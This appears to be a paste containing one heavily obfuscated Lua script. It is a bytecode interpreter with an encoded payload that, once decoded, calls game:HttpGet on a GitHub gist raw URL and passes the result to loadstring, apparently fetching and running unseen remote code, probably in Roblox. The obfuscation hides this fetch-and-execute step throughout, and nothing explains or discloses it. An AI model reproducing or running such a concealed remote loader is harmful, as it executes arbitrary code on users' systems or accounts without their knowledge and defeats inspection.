

Jan 1st, 2023 (edited)
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  1. --[[
  3. ]]--
  5. do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==3) then v13=select;v14=unpack or table.unpack;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=3;end if (v0==4) then v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==4) then v34=function()local v48=0 + 0;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(0 + (0 -0))) then v49=v33();v50=v33();v48=1172 -(1061 + 110);end if ((4 -2)==v48) then v53=v30(v50,57 -36,87 -56);v54=((v30(v50,32)==1) and  -(2 -1)) or (649 -(593 + 55));v48=12 -9;end if (v48==(1498 -(367 + 1130))) then v51=(265 -(201 + 63)) + 0;v52=(v30(v50,1 + 0,527 -((114 -65) + 458)) * ((2 + 0)^32)) + v49;v48=2;end if ((1046 -((2085 -1202) + (855 -(201 + 494))))==v48) then if (v53==(0 + 0)) then if (v52==(0 + 0)) then return v54 * (1023 -(354 + 74 + 595));else v53=2 -1;v51=0 + 0;end elseif (v53==2047) then return ((v52==(0 + 0)) and (v54 * ((167 -(126 + 40))/(1833 -(823 + 1010))))) or (v54 * NaN);end return v9(v54,v53-(356 + 667)) * (v51 + (v52/((649 -((822 -528) + 353))^(3 + 49))));end end end;v35=nil;v35=function(v40)local v55=0 + 0;local v56;local v57;while true do if (v55==3) then return v7(v57);end if (v55==0) then v56=nil;if  not v40 then v40=v33();if (v40==((1267 -(942 + 325)) + 0)) then return "";end end v55=3 -2;end if ((1880 -(1857 + 21))==v55) then v57={};for v100=90 -(64 + 25), #v56 do v57[v100]=v3(v2(v4(v56,v100,v100)));end v55=4 -1;end if (v55==(306 -(29 + 276))) then v56=v4(v25,v28,(v28 + v40) -(1 + 0));v28=v28 + v40;v55=1515 -(328 + 1185);end end end;v27=5;end if (v27==2) then v31=function()local v58=v2(v25,v28,v28);v28=v28 + 1;return v58;end;v32=nil;v32=function()local v59,v60=v2(v25,v28,v28 + 2 + 0);v28=v28 + (394 -(205 + 187));return (v60 * (916 -660)) + v59;end;v27=3;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v41)if (v2(v41,2)==79) then v29=v1(v4(v41,1,1));return "";else local v82=v3(v1(v41,16));if v29 then local v102=0;local v103;while true do if (v102==0) then v103=v6(v82,v29);v29=nil;v102=1;end if (v102==1) then return v103;end end else return v82;end end end);v27=1;end if (v27==1) then v30=nil;v30=function(v42,v43,v44)if v44 then local v83=(v42/((1 + 1)^(v43-(606 -(355 + 250)))))%((1 + 1)^(((v44-(1 + 0)) -(v43-(788 -((1924 -(1360 + 521)) + 744)))) + 1 + (0 -0)));return v83-(v83%(1 + 0));else local v84=(579 -(51 + 526))^(v43-1);return (((v42%(v84 + v84))>=v84) and (1 + 0 + 0)) or ((624 + 445) -(561 + 508));end end;v31=nil;v27=2;end if (v27==7) then v39=function(v45,v46,v47)local v61=v45[1];local v62=v45[2];local v63=v45[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1;local function v80()local v85=v61;local v86=v62;local v87=v63;local v88=v37;local v89={};local v90={};local v91={};for v95=0,v79 do if ((v95>=v87) or ((1442 + 334)>(14278 -10972))) then v89[v95-v87]=v78[v95 + (4 -3)];else v91[v95]=v78[v95 + (1248 -(925 + (1621 -(548 + 751))))];end end local v92=(v79-v87) + (1 -0);local v93;local v94;while true do local v96=0 -0;local v97;local v98;while true do if (((3971 -(516 + (918 -(28 + 7))))==(1989 + 583)) and (v96==(0 -0))) then v97=0;v98=nil;v96=(59 -(52 + 6)) + 0;end if ((2456<(3576 -(615 + 230))) and (v96==(1 + 0))) then while true do if ((2534<3125) and ((64 -(25 + 39))==v97)) then v98=550 -(489 + 61);while true do if ((2303==(3486 -(578 + 605))) and (v98==(2 -(3 -2)))) then if ((2209>=413) and (v94<=((58 + 53) -((1327 -(304 + 960)) + 44)))) then if ((v94<=1) or ((11140 -6639)<=4361)) then if ((v94>(841 -((2667 -(12 + 1871)) + 57))) or ((11553 -(13274 -5248))==(1536 + (2464 -(1196 + 351))))) then local v132=254 -(212 + 42);local v133;local v134;while true do if ((v132==(0 + 0 + (808 -(109 + 699)))) or ((415 + 972)==(3175 -(454 + (833 -478))))) then local v156=0 + 0;while true do if ((780==(1390 -(35 + 406 + 169))) and (v156==1)) then v132=1 + 0 + 0;break;end if ((v156==0) or ((1729 -1018)>=3740)) then v133=0 + 0;v134=nil;v156=1 + (0 -0);end end end if ((v132==(677 -(180 + 496))) or ((5482 -1752)<(2200 -986))) then while true do if (((430 -210)<((12169 -7765) -(45 + 2 + (431 -265)))) and (v133==(0 + 0))) then v134=v93[(478 -(213 + 261)) -2];v91[v134]=v91[v134](v14(v91,v134 + (3 -2),v77));break;end end break;end end else do return;end end elseif (((34 + 235)<=(1679 + 3005)) and (v94<=(2 + 0))) then v76=v93[1460 -(1001 + (1804 -1348))];elseif (((1454 + 279)>=572) and (v94==(6 -3))) then local v142=1354 -(1127 + 73 + 154);local v143;local v144;local v145;local v146;local v147;while true do if ((v142==(0 + 0)) or (((6213 + 2279) -4925)<=(12021 -8764))) then v143=0;v144=nil;v142=1;end if (((9024 -4565)>(2042 -(60 + 410))) and (v142==(1 + 1))) then v147=nil;while true do if ((v143==(22 -(6 + 4 + 11))) or ((1768 -(110 + 108 + 4))>(1870 + 2599))) then local v175=(265 -(134 + 131)) + 0;while true do if ((v175==(0 + 0)) or ((939 + 912)<(7 + 619))) then v77=(v146 + v144) -((1323 -(351 + 970)) -1);v147=(0 + 0) -0;v175=3 -2;end if (((5821 -(1256 + 601))>=2990) and (v175==(1 + 0))) then v143=(261 + 275) -(283 + 251);break;end end end if ((v143==(1 + 1)) or (110==(39 + (778 -567)))) then for v178=v144,v77 do local v179=0 + 0;local v180;while true do if (((16285 -12421)==(8105 -4241)) and (v179==(0 + 0))) then v180=0;while true do if (((3341 + (1796 -(169 + 1203)))==3765) and (v180==0)) then v147=v147 + (628 -(162 + 465));v91[v178]=v145[v147];break;end end break;end end end break;end if ((v143==(0 + (0 -0))) or (2455>=(4515 -(1141 + 821)))) then local v176=0 + 0;local v177;while true do if ((((951 -(755 + 196)) + 0)==v176) or (1980<=(1253 -(423 + 610)))) then v177=421 -(216 + 144 + 61);while true do if ((((2493 -1662) + 1398)>2190) and (v177==(3 -2))) then v143=1143 -(684 + 458);break;end if (((4256 -1119)==((2466 + 1319) -(394 + 254))) and (v177==0)) then local v183=0 + 0 + 0;while true do if (((190 + 558 + (4131 -2874))>(840 + 119 + 173)) and (v183==(0 -0))) then v144=v93[2];v145,v146=v88(v91[v144](v14(v91,v144 + (2 -1),v93[157 -(24 + 22 + 108)])));v183=(818 -(466 + 23)) -(72 + 256);end if ((((5941 + 5132) -6410)>(3491 -(26 + 0 + (2273 -(328 + 1440))))) and (v183==((3 -2) + 0))) then v177=(369 + 531) -(682 + 217);break;end end end end break;end end end end break;end if (((3107 -1015)<(9367 -5872)) and (1==v142)) then local v163=1023 -(944 + 79);while true do if ((3437==(12792 -9355)) and (v163==(0 -0))) then v145=nil;v146=nil;v163=1245 -(1160 + (221 -137));end if ((v163==(851 -(291 + 559))) or ((3400 -(417 + 497))==(5622 -(50 + 1331)))) then v142=2 + 0;break;end end end end else v91[v93[2]]=v93[3];end elseif ((v94<=(3 + 4)) or ((3131 -(1073 + 104))>(5151 -(159 + 781)))) then if ((v94<=(6 -1)) or (230>(1078 + 3393))) then if ((v91[v93[2 -0]]==v93[1375 -(210 + 1161)]) or ((5871 -3064)<(1596 -708))) then v76=v76 + (2 -1);else v76=v93[944 -(451 + 490)];end elseif ((v94>(13 -7)) or ((2660 -(108 + 1286))<=((2085 -(613 + 698)) -(612 + 62)))) then v91[v93[1 + 1]]=v47[v93[11 -8]];else v91[v93[2]]=v39(v86[v93[5 -2]],nil,v47);end elseif ((v94<=(1373 -(254 + 1111))) or (4472<((4629 -(142 + 466)) -(523 + 466)))) then local v136=(0 -0) -0;local v137;local v138;while true do if ((v136==(1 + 0)) or (4841<=(267 + 282))) then v91[v137 + 1 + 0]=v138;v91[v137]=v138[v93[4 + 0 + 0]];break;end if (((781 -(492 + 29 + 260))==v136) or ((656 + 2887)<3242)) then local v160=1199 -((923 -377) + 653);while true do if ((v160==((1873 -(1280 + 592)) + 0)) or ((5354 -(4462 -(523 + 1299)))>=(404 + 3538))) then v136=(598 -(321 + 276)) -0;break;end if ((v160==(0 -0)) or ((4278 -2394)>(5618 -(170 + 449)))) then v137=v93[421 -(217 + 202)];v138=v91[v93[3 + 0]];v160=1;end end end end elseif ((v94==((42 -22) -11)) or ((4404 -(1098 + (1226 -608)))<(1239 -950))) then v91[v93[(1383 -(505 + 178)) -(222 + 476)]]();else v47[v93[1707 -(367 + 1337)]]=v91[v93[2]];end v76=v76 + (2 -1);break;end if ((v98==(0 -0)) or ((2282 + 488)>(16455 -(29341 -17408)))) then local v121=1723 -((771 -(177 + 113)) + 1242);local v122;while true do if (((2299 + 1211)>=(331 -203)) and (v121==(0 + 0))) then v122=0 + 0 + 0;while true do if ((2551<=(6618 -3566)) and (v122==(0 + 0))) then local v139=0;while true do if ((v139==(1856 -(918 + (3159 -2222)))) or ((5006 -(478 + 233))<652)) then v122=1;break;end if (((2519 -(21 + 65))>(251 + 12)) and (v139==(0 -0))) then v93=v85[v76];v94=v93[1 + 0];v139=1 + (0 -0);end end end if ((v122==(793 -(712 + 80))) or ((1938 -(73 + 441))>=(11 + 4129))) then v98=2 -1;break;end end break;end end end end break;end end break;end end end end A,B=v37(v12(v80));if  not A[1] then local v99=v45[4][v76] or "?";error("Script error at ["   .. v99   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end;return v39(v38(),{},v26)(...);end if (6==v27) then v38=nil;v38=function()local v64=0 + 0;local v65;local v66;local v67;local v68;local v69;local v70;while true do local v81=0;while true do if (v81==(1 + 0)) then if ((0 + 0)~=v64) then else local v108=1215 -(354 + 861);while true do if (v108==1) then local v112=108 -(12 + 96);while true do if (1==v112) then v108=9 -7;break;end if (v112~=(0 + 0)) then else v67={};v68={v65,v66,nil,v67};v112=1;end end end if (v108~=0) then else v65={};v66={};v108=1 + 0;end if (v108==(208 -(53 + 153))) then v64=814 -(800 + 13);break;end end end break;end if (v81~=0) then else if (2~=v64) then else local v109=81 -(42 + 39);local v110;while true do if (v109~=0) then else v110=0 + 0;while true do local v114=0 -0;while true do if (v114==0) then if ((1 -0)~=v110) then else for v123=1,v33() do v67[v123]=v33();end return v68;end if (v110~=(1544 -(1541 + 3))) then else for v125=1,v33() do local v126=0 -0;local v127;local v128;while true do if (1==v126) then while true do if ((0 -0)==v127) then v128=v31();if (v30(v128,152 -(129 + 22),1 + 0)~=0) then else local v168=0 -0;local v169;local v170;local v171;local v172;local v173;local v174;while true do if (3~=v168) then else while true do if (v169~=(4 -2)) then else v174=nil;while true do if (v170~=(2 + 0)) then else while true do if (v171==0) then local v188=0;local v189;while true do if (0~=v188) then else v189=0;while true do if (v189==0) then local v197=1784 -(501 + 1283);while true do if (v197==(0 + 0)) then v172=v30(v128,2,3);v173=v30(v128,4,6);v197=1;end if (1~=v197) then else v189=1;break;end end end if (v189~=1) then else v171=1;break;end end break;end end end if (v171~=1) then else local v190=0;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191==(0 + 0)) then local v198=0;while true do if (v198~=(3 -2)) then else v191=1;break;end if (v198~=0) then else v174={v32(),v32(),nil,nil};if (v172==(57 -(29 + 28))) then local v200=0 -0;local v201;while true do if (v200==0) then v201=0 + 0;while true do if (0==v201) then v174[3]=v32();v174[7 -3]=v32();break;end end break;end end elseif (v172==1) then v174[3]=v33();elseif (v172==2) then v174[3]=v33() -((2 + 0)^16);elseif (v172==3) then local v210=0;while true do if (v210~=(623 -(576 + 47))) then else v174[3]=v33() -((6 -4)^16);v174[4 + 0]=v32();break;end end end v198=1113 -(135 + 977);end end end if ((2 -1)~=v191) then else v171=2;break;end end break;end end end if (v171~=3) then else if (v30(v173,3 + 0,3)~=(1316 -(749 + 566))) then else v174[1402 -(83 + 1315)]=v70[v174[4]];end v65[v125]=v174;break;end if (v171==(150 -(89 + 59))) then local v193=0 -0;local v194;while true do if ((530 -(84 + 446))~=v193) then else v194=27 -(8 + 19);while true do if ((0 -0)==v194) then local v199=1769 -(555 + 1214);while true do if (v199~=1) then else v194=1 -0;break;end if (v199==0) then if (v30(v173,1,1)~=1) then else v174[2]=v70[v174[2]];end if (v30(v173,1008 -(387 + 619),2)~=1) then else v174[2 + 1]=v70[v174[3 + 0]];end v199=163 -(32 + 130);end end end if (v194~=1) then else v171=3;break;end end break;end end end end break;end if (v170~=1) then else local v186=0;while true do if (v186~=(1 + 0)) then else v170=2;break;end if ((0 + 0)~=v186) then else v173=nil;v174=nil;v186=1 + 0;end end end if (v170==(0 -0)) then v171=799 -(742 + 57);v172=nil;v170=1 + 0;end end break;end if (v169~=1) then else local v181=0 -0;while true do if (v181~=(1385 -(251 + 1134))) then else v172=nil;v173=nil;v181=1;end if (v181~=(1146 -(662 + 483))) then else v169=2;break;end end end if (v169==(0 -0)) then local v182=0;while true do if (v182==0) then v170=0 + 0;v171=nil;v182=1 + 0;end if (v182~=1) then else v169=1;break;end end end end break;end if (v168==(4 -2)) then v173=nil;v174=nil;v168=877 -(280 + 594);end if (v168==(1 + 0)) then v171=nil;v172=nil;v168=2;end if (v168~=0) then else v169=0 + 0;v170=nil;v168=99 -(55 + 43);end end end break;end end break;end if (v126==0) then v127=0 + 0;v128=nil;v126=1 + 0;end end end for v129=1576 -(367 + 1208),v33() do v66[v129-1]=v38();end v110=1;end break;end end end break;end end end if (v64==(1 + 0)) then local v111=0;while true do if (v111~=0) then else v69=v33();v70={};v111=1 + 0;end if (v111==1) then for v115=1,v69 do local v116=1613 -(119 + 1494);local v117;local v118;local v119;local v120;while true do if (v116~=1) then else v119=nil;v120=nil;v116=22 -(13 + 7);end if (v116~=0) then else v117=0;v118=nil;v116=1;end if (v116~=2) then else while true do if (v117~=(1979 -(1145 + 833))) then else v120=nil;while true do if (v118~=0) then else local v140=0;while true do if (v140==(1110 -(621 + 488))) then v118=1135 -(972 + 162);break;end if (v140~=(0 + 0)) then else v119=v31();v120=nil;v140=1840 -(185 + 1654);end end end if (v118~=1) then else if (v119==(1 + 0)) then v120=v31()~=(1220 -(264 + 956));elseif (v119==2) then v120=v34();elseif (v119~=(957 -(950 + 4))) then else v120=v35();end v70[v115]=v120;break;end end break;end if (v117==0) then local v131=0 + 0;while true do if (v131~=(1 + 0)) then else v117=1 + 0;break;end if (0~=v131) then else v118=0 + 0;v119=nil;v131=1;end end end end break;end end end v68[7 -4]=v31();v111=2;end if (v111~=2) then else v64=2;break;end end end v81=3 -2;end end end end;v39=nil;v27=7;end if (3==v27) then v33=nil;v33=function()local v71=1666 -(1447 + 219);local v72;local v73;local v74;local v75;while true do if (v71==(990 -(368 + 621))) then return (v75 * (3727058 + 3412292 + 9637866)) + (v74 * (67291 -(1144 + 611))) + (v73 * (70 + (1229 -(359 + 684)))) + v72;end if (v71==((0 + 0) -0)) then v72,v73,v74,v75=v2(v25,v28,v28 + (8 -5));v28=v28 + (1907 -(855 + 1048));v71=1251 -(993 + 257);end end end;v34=nil;v27=4;end end end;v16("LOL!023O00028O0003043O00576F726B000A3O0012043O00013O0026053O0001000100010004023O0001000100020600015O00120A000100023O001207000100024O00090001000100010004023O000900010004023O000100016O00013O00013O00043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F676973742E67697468756275736572636F6E74656E742E636F6D2F4869676842752O746F6E2F633931626130663036612O3065376633303762382O62356663373239383332652F7261772F00083O0012073O00013O001207000100023O002008000100010003001204000300044O0003000100034O00015O00022O00093O000100016O00017O00083O00063O00063O00063O00063O00063O00063O00063O00073O000A3O00023O00043O00043O00073O00073O00083O00083O00093O000A3O000C3O00",v10(),...);break;end end end
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